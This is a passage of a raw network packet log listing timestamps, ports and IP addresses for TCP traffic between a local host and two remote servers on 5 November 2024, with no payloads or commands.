Nov 5, 2024 18:46:10.958741903 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.958750963 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.958751917 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.958765984 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.958776951 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.958779097 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.958798885 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.958798885 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.958811998 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.958822012 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.958826065 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.958842039 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.958857059 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.958863974 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.958877087 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.958914995 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.959131956 CET	443	49823	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:10.959201097 CET	443	49823	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:10.959407091 CET	49823	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:10.959434032 CET	49823	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:10.959443092 CET	443	49823	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:10.959455013 CET	49823	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:10.959461927 CET	443	49823	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:10.962213993 CET	49828	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:10.962259054 CET	443	49828	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:10.962331057 CET	49828	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:10.962471008 CET	49828	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:10.962479115 CET	443	49828	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:10.983131886 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.983165979 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.983175993 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.983222008 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.006906033 CET	443	49824	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:11.007540941 CET	443	49824	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:11.007599115 CET	49824	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:11.007657051 CET	49824	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:11.007682085 CET	443	49824	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:11.007704973 CET	49824	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:11.007711887 CET	443	49824	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:11.010291100 CET	49829	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:11.010318041 CET	443	49829	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:11.010396957 CET	49829	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:11.010559082 CET	49829	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:11.010571957 CET	443	49829	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:11.026104927 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.026144028 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.026159048 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.026166916 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.026186943 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.026210070 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.032546043 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.032557964 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.032571077 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.032592058 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.032617092 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.032629013 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.032639027 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.032649994 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.032660961 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.032670975 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.032676935 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.032701015 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.032725096 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.032746077 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.032757998 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.032768011 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.032779932 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.032793999 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.032798052 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.032804012 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.032819986 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.032835007 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.032862902 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.033440113 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.033466101 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.033476114 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.033492088 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.033504963 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.033701897 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.033711910 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.033720970 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.033744097 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.033759117 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.033761978 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.033773899 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.033785105 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.033797026 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.033809900 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.033834934 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.033864975 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.033881903 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.033895016 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.033902884 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.033921003 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.033931017 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.034018993 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.034029961 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.034039021 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.034049988 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.034049988 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.034066916 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.034082890 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.034193993 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.034239054 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.034274101 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.034286976 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.034297943 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.034307957 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.034343004 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.034395933 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.034405947 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.034415007 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.034425974 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.034432888 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.034436941 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.034449100 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.034451962 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.034482956 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.034542084 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.034552097 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.034557104 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.034563065 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.034573078 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.034584045 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.034595966 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.034604073 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.034607887 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.034611940 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.034625053 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.034635067 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.034645081 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.034648895 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.034657001 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.034665108 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.034668922 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.034677029 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.034681082 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.034718037 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.034719944 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.034730911 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.034740925 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.034761906 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.034784079 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.035034895 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.035092115 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.035101891 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.035146952 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.035160065 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.035168886 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.035180092 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.035190105 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.035203934 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.035214901 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.035217047 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.035223961 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.035264969 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.035293102 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.035303116 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.035320044 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.035331011 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.035341024 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.035368919 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.035373926 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.035384893 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.035401106 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.035434008 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.035443068 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.044713020 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.044750929 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.044769049 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.044780016 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.044790030 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.044822931 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.044872046 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.044878960 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.044931889 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.044951916 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.045001984 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.045013905 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.045053959 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.045079947 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.045083046 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.045094013 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.045104980 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.045115948 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.045139074 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.045166016 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.045181990 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.045192003 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.045202017 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.045224905 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.045238018 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.045257092 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.045268059 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.045279026 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.045303106 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.045346975 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.045411110 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.045419931 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.045429945 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.045445919 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.045456886 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.045463085 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.045468092 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.045475960 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.045480013 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.045517921 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.045542955 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.045546055 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.045557976 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.045568943 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.045583010 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.045593977 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.045608997 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.045636892 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.045672894 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.045685053 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.045695066 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.045705080 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.045726061 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.045743942 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.045779943 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.045789003 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.045799017 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.045810938 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.045820951 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.045834064 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.045866966 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.045898914 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.045913935 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.045927048 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.045937061 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.045948029 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.045953989 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.045981884 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.046015024 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.046025991 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.046035051 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.046046019 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.046056986 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.046066046 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.046068907 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.046091080 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.046128988 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.046164989 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.046175957 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.046185017 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.046205997 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.046228886 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.046279907 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.046289921 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.046300888 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.046324015 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.046354055 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.046380043 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.046389103 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.046397924 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.046408892 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.046418905 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.046423912 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.046430111 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.046446085 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.046477079 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.046487093 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.046493053 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.046493053 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.046499014 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.046506882 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.046519995 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.046542883 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.046556950 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.046561003 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.046577930 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.046607971 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.046674013 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.046689034 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.046700001 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.046709061 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.046717882 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.046725988 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.046729088 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.046732903 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.046739101 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.046749115 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.046765089 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.046765089 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.046772003 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.046793938 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.046799898 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.046808958 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.046823025 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.046849966 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.046876907 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.046885967 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.046894073 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.046904087 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.046910048 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.046930075 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.046938896 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.046967983 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.046977997 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.047024965 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.076666117 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.076706886 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.076718092 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.076771975 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.076782942 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.076795101 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.076797962 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.076807022 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.076843023 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.076864958 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.076879025 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.076889992 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.076903105 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.076927900 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.076942921 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.076973915 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.076986074 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.076997042 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.077008963 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.077017069 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.077049971 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.077085972 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.077099085 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.077110052 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.077121019 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.077131987 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.077135086 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.077158928 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.077158928 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.077320099 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.077331066 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.077342033 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.077353954 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.077364922 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.077377081 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.077378988 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.077379942 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.077389002 CET	80	49804	31.41.244.11	192.168.2.4
